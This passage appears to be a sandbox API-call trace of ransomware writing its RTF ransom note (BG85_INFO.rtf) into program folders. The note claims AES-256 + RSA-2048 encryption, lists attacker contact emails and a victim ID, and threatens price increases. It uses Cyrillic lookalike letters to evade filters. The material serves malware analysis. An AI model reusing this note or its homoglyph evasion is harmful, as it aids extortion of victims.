r\\f1\\lang1049\\'e5\\f0\\lang1033 st\\f1\\lang1049\\'ee\\f0\\lang1033 r\\f1\\lang1049\\'e5\\f0\\lang1033 y\\f1\\lang1049\\'ee\\f0\\lang1033 ur fil\\f1\\lang1049\\'e5\\f0\\lang1033 s pl\\f1\\lang1049\\'e5\\'e0\\f0\\lang1033 s\\f1\\lang1049\\'e5\\f0\\lang1033 writ\\f1\\lang1049\\'e5\\f0\\lang1033 us t\\f1\\lang1049\\'ee\\f0\\lang1033 th\\f1\\lang1049\\'e5\\f0\\lang1033 \\f1\\lang1049\\'e5\\f0\\lang1033 -m\\f1\\lang1049\\'e0\\f0\\lang1033 ils:\\par\r\n\\b\\fs28 BobGreen85@criptext.com\\par\r\nBobGreen85@aol.com\\par\r\nBobGreen85@tutanota.com\\par\r\n\\b0\\fs24 In subj\\f1\\lang1049\\'e5\\f0\\lang1033 ct lin\\f1\\lang1049\\'e5\\f0\\lang1033 writ\\f1\\lang1049\\'e5\\f0\\lang1033 \\f1\\lang1049\\'f3\\'ee\\f0\\lang1033 ur ID: \\b\\fs28 2660EAA9CA5C3071\\fs24\\par\r\n\\par\r\n\\cf1 Imp\\f1\\lang1049\\'ee\\f0\\lang1033 rt\\f1\\lang1049\\'e0\\f0\\lang1033 nt!\\cf0 Pl\\f1\\lang1049\\'e5\\'e0\\f0\\lang1033 s\\f1\\lang1049\\'e5\\f0\\lang1033 s\\f1\\lang1049\\'e5\\f0\\lang1033 nd y\\f1\\lang1049\\'ee\\f0\\lang1033 ur m\\f1\\lang1049\\'e5\\f0\\lang1033 ss\\f1\\lang1049\\'e0\\f0\\lang1033 g\\f1\\lang1049\\'e5\\f0\\lang1033 t\\f1\\lang1049\\'ee\\f0\\lang1033 \\f1\\lang1049\\'e0\\f0\\lang1033 ll \\f1\\lang1049\\'ee\\f0\\lang1033 f \\f1\\lang1049\\'ee\\f0\\lang1033 ur 3 \\f1\\lang1049\\'e5\\f0\\lang1033 -m\\f1\\lang1049\\'e0\\f0\\lang1033 il \\f1\\lang1049\\'e0\\f0\\lang1033 ddr\\f1\\lang1049\\'e5\\f0\\lang1033 ss\\f1\\lang1049\\'e5\\f0\\lang1033 s. This is r\\f1\\lang1049\\'e5\\'e0\\f0\\lang1033 ll\\f1\\lang1049\\'f3\\f0\\lang1033 imp\\f1\\lang1049\\'ee\\f0\\lang1033 rt\\f1\\lang1049\\'e0\\f0\\lang1033 nt b\\f1\\lang1049\\'e5\\f0\\lang1033 c\\f1\\lang1049\\'e0\\f0\\lang1033 us\\f1\\lang1049\\'e5\\f0\\lang1033 \\f1\\lang1049\\'ee\\f0\\lang1033 f d\\f1\\lang1049\\'e5\\f0\\lang1033 liv\\f1\\lang1049\\'e5\\f0\\lang1033 r\\f1\\lang1049\\'f3\\f0\\lang1033 pr\\f1\\lang1049\\'ee\\f0\\lang1033 bl\\f1\\lang1049\\'e5\\f0\\lang1033 ms \\f1\\lang1049\\'ee\\f0\\lang1033 f s\\f1\\lang1049\\'ee\\f0\\lang1033 m\\f1\\lang1049\\'e5\\f0\\lang1033 m\\f1\\lang1049\\'e0\\f0\\lang1033 il s\\f1\\lang1049\\'e5\\f0\\lang1033 rvi\\f1\\lang1049\\'f1\\'e5\\f0\\lang1033 s!\\par\r\n\\cf1 Important!\\cf0 If you haven't received a response from us within 24 hours, please try to use a different email service\\f1\\lang1049 (\\f0\\lang1033 Gmail, Yahoo, AOL, etc\\f1\\lang1049 )\\f0\\lang1033 .\\par\r\n\\cf1 Important!\\cf0 Please check your SPAM folder each time you wait for our response! If you find our email in the SPAM folder please move it to your Inbox.\\par\r\n\\cf1 Important! \\cf0 We are always in touch and ready to help you as soon as possible!\\par\r\n\\par\r\n\\b0\\f1\\lang1049\\'c0\\f0\\lang1033 tt\\f1\\lang1049\\'e0\\f0\\lang1033 ch up t\\f1\\lang1049\\'ee\\f0\\lang1033 3 sm\\f1\\lang1049\\'e0\\f0\\lang1033 ll \\f1\\lang1049\\'e5\\f0\\lang1033 ncr\\f1\\lang1049\\'f3\\f0\\lang1033 pt\\f1\\lang1049\\'e5\\f0\\lang1033 d fil\\f1\\lang1049\\'e5\\f0\\lang1033 s f\\f1\\lang1049\\'ee\\f0\\lang1033 r fr\\f1\\lang1049\\'e5\\'e5\\f0\\lang1033 t\\f1\\lang1049\\'e5\\f0\\lang1033 st d\\f1\\lang1049\\'e5\\'f1\\f0\\lang1033 ryption. Pl\\f1\\lang1049\\'e5\\'e0\\f0\\lang1033 s\\f1\\lang1049\\'e5\\f0\\lang1033 n\\f1\\lang1049\\'ee\\f0\\lang1033 te th\\f1\\lang1049\\'e0\\f0\\lang1033 t th\\f1\\lang1049\\'e5\\f0\\lang1033 fil\\f1\\lang1049\\'e5\\f0\\lang1033 s y\\f1\\lang1049\\'ee\\f0\\lang1033 u s\\f1\\lang1049\\'e5\\f0\\lang1033 nd us sh\\f1\\lang1049\\'ee\\f0\\lang1033 uld n\\f1\\lang1049\\'ee\\f0\\lang1033 t c\\f1\\lang1049\\'ee\\f0\\lang1033 nt\\f1\\lang1049\\'e0\\f0\\lang1033 in \\f1\\lang1049\\'e0\\f0\\lang1033 n\\f1\\lang1049\\'f3\\f0\\lang1033 v\\f1\\lang1049\\'e0\\f0\\lang1033 lu\\f1\\lang1049\\'e0\\f0\\lang1033 bl\\f1\\lang1049\\'e5\\f0\\lang1033 inf\\f1\\lang1049\\'ee\\f0\\lang1033 rm\\f1\\lang1049\\'e0\\f0\\lang1033 ti\\f1\\lang1049\\'ee\\f0\\lang1033 n.\\f1\\lang1049 \\f0\\lang1033 W\\f1\\lang1049\\'e5\\f0\\lang1033 will s\\f1\\lang1049\\'e5\\f0\\lang1033 nd y\\f1\\lang1049\\'ee\\f0\\lang1033 u t\\f1\\lang1049\\'e5\\f0\\lang1033 st d\\f1\\lang1049\\'e5\\f0\\lang1033 cr\\f1\\lang1049\\'f3\\f0\\lang1033 pt\\f1\\lang1049\\'e5\\f0\\lang1033 d files in \\f1\\lang1049\\'ee\\f0\\lang1033 ur r\\f1\\lang1049\\'e5\\f0\\lang1033 sp\\f1\\lang1049\\'ee\\f0\\lang1033 ns\\f1\\lang1049\\'e5\\f0\\lang1033 f\\f1\\lang1049\\'ee\\f0\\lang1033 r y\\f1\\lang1049\\'ee\\f0\\lang1033 ur c\\f1\\lang1049\\'ee\\f0\\lang1033 nfid\\f1\\lang1049\\'e5\\f0\\lang1033 n\\f1\\lang1049\\'f1\\'e5\\f0\\lang1033 .\\par\r\nOf course you will receive all the necessary instructions h\\f1\\lang1049\\'ee\\f0\\lang1033 w t\\f1\\lang1049\\'ee\\f0\\lang1033 d\\f1\\lang1049\\'e5\\f0\\lang1033 cr\\f1\\lang1049\\'f3\\f0\\lang1033 pt y\\f1\\lang1049\\'ee\\f0\\lang1033 ur fil\\f1\\lang1049\\'e5\\f0\\lang1033 s!\\par\r\n\\par\r\n\\cf1\\b Important!\\par\r\n\\cf0 Pl\\f1\\lang1049\\'e5\\'e0\\f0\\lang1033 s\\f1\\lang1049\\'e5\\f0\\lang1033 n\\f1\\lang1049\\'ee\\f0\\lang1033 te that we are professionals and just doing our job!\\par\r\nPlease d\\f1\\lang1049\\'ee\\f0\\lang1033 n\\f1\\lang1049\\'ee\\f0\\lang1033 t w\\f1\\lang1049\\'e0\\f0\\lang1033 st\\f1\\lang1049\\'e5\\f0\\lang1033 th\\f1\\lang1049\\'e5\\f0\\lang1033 tim\\f1\\lang1049\\'e5\\f0\\lang1033 \\f1\\lang1049\\'e0\\f0\\lang1033 nd d\\f1\\lang1049\\'ee\\f0\\lang1033 n\\f1\\lang1049\\'ee\\f0\\lang1033 t tr\\f1\\lang1049\\'f3\\f0\\lang1033 to d\\f1\\lang1049\\'e5\\'f1\\'e5\\f0\\lang1033 ive us - it will r\\f1\\lang1049\\'e5\\f0\\lang1033 sult \\f1\\lang1049\\'ee\\f0\\lang1033 nly pri\\f1\\lang1049\\'f1\\'e5\\f0\\lang1033 incr\\f1\\lang1049\\'e5\\'e0\\f0\\lang1033 s\\f1\\lang1049\\'e5\\f0\\lang1033 !\\par\r\nW\\f1\\lang1049\\'e5\\f0\\lang1033 \\f1\\lang1049\\'e0\\f0\\lang1033 r\\f1\\lang1049\\'e5\\f0\\lang1033 alw\\f1\\lang1049\\'e0\\'f3\\f0\\lang1033 s \\f1\\lang1049\\'ee\\f0\\lang1033 p\\f1\\lang1049\\'e5\\f0\\lang1033 n\\f1\\lang1049\\'e5\\f0\\lang1033 d f\\f1\\lang1049\\'ee\\f0\\lang1033 r di\\f1\\lang1049\\'e0\\f0\\lang1033 l\\f1\\lang1049\\'ee\\f0\\lang1033 g \\f1\\lang1049\\'e0\\f0\\lang1033 nd r\\f1\\lang1049\\'e5\\'e0\\f0\\lang1033 dy t\\f1\\lang1049\\'ee\\f0\\lang1033 h\\f1\\lang1049\\'e5\\f0\\lang1033 lp \\f1\\lang1049\\'f3\\'ee\\f0\\lang1033 u.\\par\r\n\\cf2\\fs28 uqpweo38\\cf0\\f1\\fs32\\lang1049\\par\r\n}\r\n", cchWideChar=7247, lpMultiByteStr=0x1e943a8, cbMultiByte=7247, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr="{\\rtf1\\ansi\\ansicpg1251\\deff0\\nouicompat\\deflang1049{\\fonttbl{\\f0\\fnil\\fcharset0 Calibri;}{\\f1\\fnil\\fcharset204 Calibri;}}\r\n{\\colortbl ;\\red255\\green0\\blue0;\\red255\\green255\\blue255;}\r\n{\\*\\generator Riched20 10.0.15063}\\viewkind4\\uc1 \r\n\\pard\\ri-74\\sl240\\slmult1\\qc\\tx8378\\b\\f0\\fs24\\lang1033 ALL YOUR VALUABLE DATA WAS ENCRYPTED!\\par\r\n\r\n\\pard\\ri-74\\sl240\\slmult1\\tx8378\\par\r\n\\b0 All y\\f1\\lang1049\\'ee\\f0\\lang1033 ur fil\\f1\\lang1049\\'e5\\f0\\lang1033 s w\\f1\\lang1049\\'e5\\f0\\lang1033 r\\f1\\lang1049\\'e5\\f0\\lang1033 \\f1\\lang1049\\'e5\\f0\\lang1033 n\\f1\\lang1049\\'f1\\f0\\lang1033 r\\f1\\lang1049\\'f3\\f0\\lang1033 pt\\f1\\lang1049\\'e5\\f0\\lang1033 d with str\\f1\\lang1049\\'ee\\f0\\lang1033 ng cr\\f1\\lang1049\\'f3\\f0\\lang1033 pt\\f1\\lang1049\\'ee\\f0\\lang1033 \\f1\\lang1049\\'e0\\f0\\lang1033 lg\\f1\\lang1049\\'ee\\f0\\lang1033 rithm \\f1\\lang1049\\'c0\\'c5\\f0\\lang1033 S-256 + RS\\f1\\lang1049\\'c0\\f0\\lang1033 -2048.\\par\r\nPl\\f1\\lang1049\\'e5\\'e0\\f0\\lang1033 s\\f1\\lang1049\\'e5\\f0\\lang1033 b\\f1\\lang1049\\'e5\\f0\\lang1033 sur\\f1\\lang1049\\'e5\\f0\\lang1033 th\\f1\\lang1049\\'e0\\f0\\lang1033 t y\\f1\\lang1049\\'ee\\f0\\lang1033 ur fil\\f1\\lang1049\\'e5\\f0\\lang1033 s \\f1\\lang1049\\'e0\\f0\\lang1033 r\\f1\\lang1049\\'e5\\f0\\lang1033 n\\f1\\lang1049\\'ee\\f0\\lang1033 t br\\f1\\lang1049\\'ee\\f0\\lang1033 k\\f1\\lang1049\\'e5\\f0\\lang1033 n \\f1\\lang1049\\'e0\\f0\\lang1033 nd \\f1\\lang1049\\'f3\\'ee\\f0\\lang1033 u c\\f1\\lang1049\\'e0\\f0\\lang1033 n r\\f1\\lang1049\\'e5\\f0\\lang1033 st\\f1\\lang1049\\'ee\\f0\\lang1033 r\\f1\\lang1049\\'e5\\f0\\lang1033 th\\f1\\lang1049\\'e5\\f0\\lang1033 m t\\f1\\lang1049\\'ee\\f0\\lang1033 d\\f1\\lang1049\\'e0\\f0\\lang1033 y.\\par\r\n\\par\r\nIf y\\f1\\lang1049\\'ee\\f0\\lang1033 u r\\f1\\lang1049\\'e5\\'e0\\f0\\lang1033 ll\\f1\\lang1049\\'f3\\f0\\lang1033 w\\f1\\lang1049\\'e0\\f0\\lang1033 nt t\\f1\\lang1049\\'ee\\f0\\lang1033 r\\f1\\lang1049\\'e5\\f0\\lang1033 st\\f1\\lang1049\\'ee\\f0\\lang1033 r\\f1\\lang1049\\'e5\\f0\\lang1033 y\\f1\\lang1049\\'ee\\f0\\lang1033 ur fil\\f1\\lang1049\\'e5\\f0\\lang1033 s pl\\f1\\lang1049\\'e5\\'e0\\f0\\lang1033 s\\f1\\lang1049\\'e5\\f0\\lang1033 writ\\f1\\lang1049\\'e5\\f0\\lang1033 us t\\f1\\lang1049\\'ee\\f0\\lang1033 th\\f1\\lang1049\\'e5\\f0\\lang1033 \\f1\\lang1049\\'e5\\f0\\lang1033 -m\\f1\\lang1049\\'e0\\f0\\lang1033 ils:\\par\r\n\\b\\fs28 BobGreen85@criptext.com\\par\r\nBobGreen85@aol.com\\par\r\nBobGreen85@tutanota.com\\par\r\n\\b0\\fs24 In subj\\f1\\lang1049\\'e5\\f0\\lang1033 ct lin\\f1\\lang1049\\'e5\\f0\\lang1033 writ\\f1\\lang1049\\'e5\\f0\\lang1033 \\f1\\lang1049\\'f3\\'ee\\f0\\lang1033 ur ID: \\b\\fs28 2660EAA9CA5C3071\\fs24\\par\r\n\\par\r\n\\cf1 Imp\\f1\\lang1049\\'ee\\f0\\lang1033 rt\\f1\\lang1049\\'e0\\f0\\lang1033 nt!\\cf0 Pl\\f1\\lang1049\\'e5\\'e0\\f0\\lang1033 s\\f1\\lang1049\\'e5\\f0\\lang1033 s\\f1\\lang1049\\'e5\\f0\\lang1033 nd y\\f1\\lang1049\\'ee\\f0\\lang1033 ur m\\f1\\lang1049\\'e5\\f0\\lang1033 ss\\f1\\lang1049\\'e0\\f0\\lang1033 g\\f1\\lang1049\\'e5\\f0\\lang1033 t\\f1\\lang1049\\'ee\\f0\\lang1033 \\f1\\lang1049\\'e0\\f0\\lang1033 ll \\f1\\lang1049\\'ee\\f0\\lang1033 f \\f1\\lang1049\\'ee\\f0\\lang1033 ur 3 \\f1\\lang1049\\'e5\\f0\\lang1033 -m\\f1\\lang1049\\'e0\\f0\\lang1033 il \\f1\\lang1049\\'e0\\f0\\lang1033 ddr\\f1\\lang1049\\'e5\\f0\\lang1033 ss\\f1\\lang1049\\'e5\\f0\\lang1033 s. This is r\\f1\\lang1049\\'e5\\'e0\\f0\\lang1033 ll\\f1\\lang1049\\'f3\\f0\\lang1033 imp\\f1\\lang1049\\'ee\\f0\\lang1033 rt\\f1\\lang1049\\'e0\\f0\\lang1033 nt b\\f1\\lang1049\\'e5\\f0\\lang1033 c\\f1\\lang1049\\'e0\\f0\\lang1033 us\\f1\\lang1049\\'e5\\f0\\lang1033 \\f1\\lang1049\\'ee\\f0\\lang1033 f d\\f1\\lang1049\\'e5\\f0\\lang1033 liv\\f1\\lang1049\\'e5\\f0\\lang1033 r\\f1\\lang1049\\'f3\\f0\\lang1033 pr\\f1\\lang1049\\'ee\\f0\\lang1033 bl\\f1\\lang1049\\'e5\\f0\\lang1033 ms \\f1\\lang1049\\'ee\\f0\\lang1033 f s\\f1\\lang1049\\'ee\\f0\\lang1033 m\\f1\\lang1049\\'e5\\f0\\lang1033 m\\f1\\lang1049\\'e0\\f0\\lang1033 il s\\f1\\lang1049\\'e5\\f0\\lang1033 rvi\\f1\\lang1049\\'f1\\'e5\\f0\\lang1033 s!\\par\r\n\\cf1 Important!\\cf0 If you haven't received a response from us within 24 hours, please try to use a different email service\\f1\\lang1049 (\\f0\\lang1033 Gmail, Yahoo, AOL, etc\\f1\\lang1049 )\\f0\\lang1033 .\\par\r\n\\cf1 Important!\\cf0 Please check your SPAM folder each time you wait for our response! If you find our email in the SPAM folder please move it to your Inbox.\\par\r\n\\cf1 Important! \\cf0 We are always in touch and ready to help you as soon as possible!\\par\r\n\\par\r\n\\b0\\f1\\lang1049\\'c0\\f0\\lang1033 tt\\f1\\lang1049\\'e0\\f0\\lang1033 ch up t\\f1\\lang1049\\'ee\\f0\\lang1033 3 sm\\f1\\lang1049\\'e0\\f0\\lang1033 ll \\f1\\lang1049\\'e5\\f0\\lang1033 ncr\\f1\\lang1049\\'f3\\f0\\lang1033 pt\\f1\\lang1049\\'e5\\f0\\lang1033 d fil\\f1\\lang1049\\'e5\\f0\\lang1033 s f\\f1\\lang1049\\'ee\\f0\\lang1033 r fr\\f1\\lang1049\\'e5\\'e5\\f0\\lang1033 t\\f1\\lang1049\\'e5\\f0\\lang1033 st d\\f1\\lang1049\\'e5\\'f1\\f0\\lang1033 ryption. Pl\\f1\\lang1049\\'e5\\'e0\\f0\\lang1033 s\\f1\\lang1049\\'e5\\f0\\lang1033 n\\f1\\lang1049\\'ee\\f0\\lang1033 te th\\f1\\lang1049\\'e0\\f0\\lang1033 t th\\f1\\lang1049\\'e5\\f0\\lang1033 fil\\f1\\lang1049\\'e5\\f0\\lang1033 s y\\f1\\lang1049\\'ee\\f0\\lang1033 u s\\f1\\lang1049\\'e5\\f0\\lang1033 nd us sh\\f1\\lang1049\\'ee\\f0\\lang1033 uld n\\f1\\lang1049\\'ee\\f0\\lang1033 t c\\f1\\lang1049\\'ee\\f0\\lang1033 nt\\f1\\lang1049\\'e0\\f0\\lang1033 in \\f1\\lang1049\\'e0\\f0\\lang1033 n\\f1\\lang1049\\'f3\\f0\\lang1033 v\\f1\\lang1049\\'e0\\f0\\lang1033 lu\\f1\\lang1049\\'e0\\f0\\lang1033 bl\\f1\\lang1049\\'e5\\f0\\lang1033 inf\\f1\\lang1049\\'ee\\f0\\lang1033 rm\\f1\\lang1049\\'e0\\f0\\lang1033 ti\\f1\\lang1049\\'ee\\f0\\lang1033 n.\\f1\\lang1049 \\f0\\lang1033 W\\f1\\lang1049\\'e5\\f0\\lang1033 will s\\f1\\lang1049\\'e5\\f0\\lang1033 nd y\\f1\\lang1049\\'ee\\f0\\lang1033 u t\\f1\\lang1049\\'e5\\f0\\lang1033 st d\\f1\\lang1049\\'e5\\f0\\lang1033 cr\\f1\\lang1049\\'f3\\f0\\lang1033 pt\\f1\\lang1049\\'e5\\f0\\lang1033 d files in \\f1\\lang1049\\'ee\\f0\\lang1033 ur r\\f1\\lang1049\\'e5\\f0\\lang1033 sp\\f1\\lang1049\\'ee\\f0\\lang1033 ns\\f1\\lang1049\\'e5\\f0\\lang1033 f\\f1\\lang1049\\'ee\\f0\\lang1033 r y\\f1\\lang1049\\'ee\\f0\\lang1033 ur c\\f1\\lang1049\\'ee\\f0\\lang1033 nfid\\f1\\lang1049\\'e5\\f0\\lang1033 n\\f1\\lang1049\\'f1\\'e5\\f0\\lang1033 .\\par\r\nOf course you will receive all the necessary instructions h\\f1\\lang1049\\'ee\\f0\\lang1033 w t\\f1\\lang1049\\'ee\\f0\\lang1033 d\\f1\\lang1049\\'e5\\f0\\lang1033 cr\\f1\\lang1049\\'f3\\f0\\lang1033 pt y\\f1\\lang1049\\'ee\\f0\\lang1033 ur fil\\f1\\lang1049\\'e5\\f0\\lang1033 s!\\par\r\n\\par\r\n\\cf1\\b Important!\\par\r\n\\cf0 Pl\\f1\\lang1049\\'e5\\'e0\\f0\\lang1033 s\\f1\\lang1049\\'e5\\f0\\lang1033 n\\f1\\lang1049\\'ee\\f0\\lang1033 te that we are professionals and just doing our job!\\par\r\nPlease d\\f1\\lang1049\\'ee\\f0\\lang1033 n\\f1\\lang1049\\'ee\\f0\\lang1033 t w\\f1\\lang1049\\'e0\\f0\\lang1033 st\\f1\\lang1049\\'e5\\f0\\lang1033 th\\f1\\lang1049\\'e5\\f0\\lang1033 tim\\f1\\lang1049\\'e5\\f0\\lang1033 \\f1\\lang1049\\'e0\\f0\\lang1033 nd d\\f1\\lang1049\\'ee\\f0\\lang1033 n\\f1\\lang1049\\'ee\\f0\\lang1033 t tr\\f1\\lang1049\\'f3\\f0\\lang1033 to d\\f1\\lang1049\\'e5\\'f1\\'e5\\f0\\lang1033 ive us - it will r\\f1\\lang1049\\'e5\\f0\\lang1033 sult \\f1\\lang1049\\'ee\\f0\\lang1033 nly pri\\f1\\lang1049\\'f1\\'e5\\f0\\lang1033 incr\\f1\\lang1049\\'e5\\'e0\\f0\\lang1033 s\\f1\\lang1049\\'e5\\f0\\lang1033 !\\par\r\nW\\f1\\lang1049\\'e5\\f0\\lang1033 \\f1\\lang1049\\'e0\\f0\\lang1033 r\\f1\\lang1049\\'e5\\f0\\lang1033 alw\\f1\\lang1049\\'e0\\'f3\\f0\\lang1033 s \\f1\\lang1049\\'ee\\f0\\lang1033 p\\f1\\lang1049\\'e5\\f0\\lang1033 n\\f1\\lang1049\\'e5\\f0\\lang1033 d f\\f1\\lang1049\\'ee\\f0\\lang1033 r di\\f1\\lang1049\\'e0\\f0\\lang1033 l\\f1\\lang1049\\'ee\\f0\\lang1033 g \\f1\\lang1049\\'e0\\f0\\lang1033 nd r\\f1\\lang1049\\'e5\\'e0\\f0\\lang1033 dy t\\f1\\lang1049\\'ee\\f0\\lang1033 h\\f1\\lang1049\\'e5\\f0\\lang1033 lp \\f1\\lang1049\\'f3\\'ee\\f0\\lang1033 u.\\par\r\n\\cf2\\fs28 uqpweo38\\cf0\\f1\\fs32\\lang1049\\par\r\n}\r\n;Ò\x9d¹t\x1fÎ[.ÈæÖ\x09\x8cUYѸ0Þ¿\x9e£\x8d¥R\x17ö×", lpUsedDefaultChar=0x0) returned 7247 [0135.970] WriteFile (in: hFile=0x1d4, lpBuffer=0x1e943a8*, nNumberOfBytesToWrite=0x1c4f, lpNumberOfBytesWritten=0x395fdbc, lpOverlapped=0x0 | out: lpBuffer=0x1e943a8*, lpNumberOfBytesWritten=0x395fdbc*=0x1c4f, lpOverlapped=0x0) returned 1 [0135.972] CloseHandle (hObject=0x1d4) returned 1 [0135.972] GetFileAttributesW (lpFileName="C:\\Program Files (x86)\\Java\\jre7\\lib\\zi\\Atlantic\\BG85_INFO.rtf" (normalized: "c:\\program files (x86)\\java\\jre7\\lib\\zi\\atlantic\\bg85_info.rtf")) returned 0xffffffff [0135.972] GetLastError () returned 0x2 [0135.972] CreateFileW (lpFileName="C:\\Program Files (x86)\\Java\\jre7\\lib\\zi\\Atlantic\\BG85_INFO.rtf" (normalized: "c:\\program files (x86)\\java\\jre7\\lib\\zi\\atlantic\\bg85_info.rtf"), dwDesiredAccess=0xc0000000, dwShareMode=0x0, lpSecurityAttributes=0x0, dwCreationDisposition=0x2, dwFlagsAndAttributes=0x80, hTemplateFile=0x0) returned 0x1d4 [0135.973] WideCharToMultiByte (in: CodePage=0x4e4, dwFlags=0x0, lpWideCharStr="{\\rtf1\\ansi\\ansicpg1251\\deff0\\nouicompat\\deflang1049{\\fonttbl{\\f0\\fnil\\fcharset0 Calibri;}{\\f1\\fnil\\fcharset204 Calibri;}}\r\n{\\colortbl ;\\red255\\green0\\blue0;\\red255\\green255\\blue255;}\r\n{\\*\\generator Riched20 10.0.15063}\\viewkind4\\uc1 \r\n\\pard\\ri-74\\sl240\\slmult1\\qc\\tx8378\\b\\f0\\fs24\\lang1033 ALL YOUR VALUABLE DATA WAS ENCRYPTED!\\par\r\n\r\n\\pard\\ri-74\\sl240\\slmult1\\tx8378\\par\r\n\\b0 All y\\f1\\lang1049\\'ee\\f0\\lang1033 ur fil\\f1\\lang1049\\'e5\\f0\\lang1033 s w\\f1\\lang1049\\'e5\\f0\\lang1033 r\\f1\\lang1049\\'e5\\f0\\lang1033 \\f1\\lang1049\\'e5\\f0\\lang1033 n\\f1\\lang1049\\'f1\\f0\\lang1033 r\\f1\\lang1049\\'f3\\f0\\lang1033 pt\\f1\\lang1049\\'e5\\f0\\lang1033 d with str\\f1\\lang1049\\'ee\\f0\\lang1033 ng cr\\f1\\lang1049\\'f3\\f0\\lang1033 pt\\f1\\lang1049\\'ee\\f0\\lang1033 \\f1\\lang1049\\'e0\\f0\\lang1033 lg\\f1\\lang1049\\'ee\\f0\\lang1033 rithm \\f1\\lang1049\\'c0\\'c5\\f0\\lang1033 S-256 + RS\\f1\\lang1049\\'c0\\f0\\lang1033 -2048.\\par\r\nPl\\f1\\lang1049\\'e5\\'e0\\f0\\lang1033 s\\f1\\lang1049\\'e5\\f0\\lang1033 b\\f1\\lang1049\\'e5\\f0\\lang1033 sur\\f1\\lang1049\\'e5\\f0\\lang1033 th\\f1\\lang1049\\'e0\\f0\\lang1033 t y\\f1\\lang1049\\'ee\\f0\\lang1033 ur fil\\f1\\lang1049\\'e5\\f0\\lang1033 s \\f1\\lang1049\\'e0\\f0\\lang1033 r\\f1\\lang1049\\'e5\\f0\\lang1033 n\\f1\\lang1049\\'ee\\f0\\lang1033 t br\\f1\\lang1049\\'ee\\f0\\lang1033 k\\f1\\lang1049\\'e5\\f0\\lang1033 n \\f1\\lang1049\\'e0\\f0\\lang1033 nd \\f1\\lang1049\\'f3\\'ee\\f0\\lang1033 u c\\f1\\lang1049\\'e0\\f0\\lang1033 n r\\f1\\lang1049\\'e5\\f0\\lang1033 st\\f1\\lang1049\\'ee\\f0\\lang1033 r\\f1\\lang1049\\'e5\\f0\\lang1033 th\\f1\\lang1049\\'e5\\f0\\lang1033 m t\\f1\\lang1049\\'ee\\f0\\lang1033 d\\f1\\lang1049\\'e0\\f0\\lang1033 y.\\par\r\n\\par\r\nIf y\\f1\\lang1049\\'ee\\f0\\lang1033 u r\\f1\\lang1049\\'e5\\'e0\\f0\\lang1033 ll\\f1\\lang1049\\'f3\\f0\\lang1033 w\\f1\\lang1049\\'e0\\f0\\lang1033 nt t\\f1\\lang1049\\'ee\\f0\\lang1033 r\\f1\\lang1049\\'e5\\f0\\lang1033 st\\f1\\lang1049\\'ee\\f0\\lang1033 r\\f1\\lang1049\\'e5\\f0\\lang1033 y\\f1\\lang1049\\'ee\\f0\\lang1033 ur fil\\f1\\lang1049\\'e5\\f0\\lang1033 s pl\\f1\\lang1049\\'e5\\'e0\\f0\\lang1033 s\\f1\\lang1049\\'e5\\f0\\lang1033 writ\\f1\\lang1049\\'e5\\f0\\lang1033 us t\\f1\\lang1049\\'ee\\f0\\lang1033 th\\f1\\lang1049\\'e5\\f0\\lang1033 \\f1\\lang1049\\'e5\\f0\\lang1033 -m\\f1\\lang1049\\'e0\\f0\\lang1033 ils:\\par\r\n\\b\\fs28 BobGreen85@criptext.com\\par\r\nBobGreen85@aol.com\\par\r\nBobGreen85@tutanota.com\\par\r\n\\b0\\fs24 In subj\\f1\\lang1049\\'e5\\f0\\lang1033 ct lin\\f1\\lang1049\\'e5\\f0\\lang1033 writ\\f1\\lang1049\\'e5\\f0\\lang1033 \\f1\\lang1049\\'f3\\'ee\\f0\\lang1033 ur ID: \\b\\fs28 2660EAA9CA5C3071\\fs24\\par\r\n\\par\r\n\\cf1 Imp\\f1\\lang1049\\'ee\\f0\\lang1033 rt\\f1\\lang1049\\'e0\\f0\\lang1033 nt!\\cf0 Pl\\f1\\lang1049\\'e5\\'e0\\f0\\lang1033 s\\f1\\lang1049\\'e5\\f0\\lang1033 s\\f1\\lang1049\\'e5\\f0\\lang1033 nd y\\f1\\lang1049\\'ee\\f0\\lang1033 ur m\\f1\\lang1049\\'e5\\f0\\lang1033 ss\\f1\\lang1049\\'e0\\f0\\lang1033 g\\f1\\lang1049\\'e5\\f0\\lang1033 t\\f1\\lang1049\\'ee\\f0\\lang1033 \\f1\\lang1049\\'e0\\f0\\lang1033 ll \\f1\\lang1049\\'ee\\f0\\lang1033 f \\f1\\lang1049\\'ee\\f0\\lang1033 ur 3 \\f1\\lang1049\\'e5\\f0\\lang1033 -m\\f1\\lang1049\\'e0\\f0\\lang1033 il \\f1\\lang1049\\'e0\\f0\\lang1033 ddr\\f1\\lang1049\\'e5\\f0\\lang1033 ss\\f1\\lang1049\\'e5\\f0\\lang1033 s. This is r\\f1\\lang1049\\'e5\\'e0\\f0\\lang1033 ll\\f1\\lang1049\\'f3\\f0\\lang1033 imp\\f1\\lang1049\\'ee\\f0\\lang1033 rt\\f1\\lang1049\\'e0\\f0\\lang1033 nt b\\f1\\lang1049\\'e5\\f0\\lang1033 c\\f1\\lang1049\\'e0\\f0\\lang1033 us\\f1\\lang1049\\'e5\\f0\\lang1033 \\f1\\lang1049\\'ee\\f0\\lang1033 f d\\f1\\lang1049\\'e5\\f0\\lang1033 liv\\f1\\lang1049\\'e5\\f0\\lang1033 r\\f1\\lang1049\\'f3\\f0\\lang1033 pr\\f1\\lang1049\\'ee\\f0\\lang1033 bl\\f1\\lang1049\\'e5\\f0\\lang1033 ms \\f1\\lang1049\\'ee\\f0\\lang1033 f s\\f1\\lang1049\\'ee\\f0\\lang1033 m\\f1\\lang1049\\'e5\\f0\\lang1033 m\\f1\\lang1049\\'e0\\f0\\lang1033 il s\\f1\\lang1049\\'e5\\f0\\lang1033 rvi\\f1\\lang1049\\'f1\\'e5\\f0\\lang1033 s!\\par\r\n\\cf1 Important!\\cf0 If you haven't received a response from us within 24 hours, please try to use a different email service\\f1\\lang1049 (\\f0\\lang1033 Gmail, Yahoo, AOL, etc\\f1\\lang1049 )\\f0\\lang1033 .\\par\r\n\\cf1 Important!\\cf0 Please check your SPAM folder each time you wait for our response! If you find our email in the SPAM folder please move it to your Inbox.\\par\r\n\\cf1 Important! \\cf0 We are always in touch and ready to help you as soon as possible!\\par\r\n\\par\r\n\\b0\\f1\\lang1049\\'c0\\f0\\lang1033 tt\\f1\\lang1049\\'e0\\f0\\lang1033 ch up t\\f1\\lang1049\\'ee\\f0\\lang1033 3 sm\\f1\\lang1049\\'e0\\f0\\lang1033 ll \\f1\\lang1049\\'e5\\f0\\lang1033 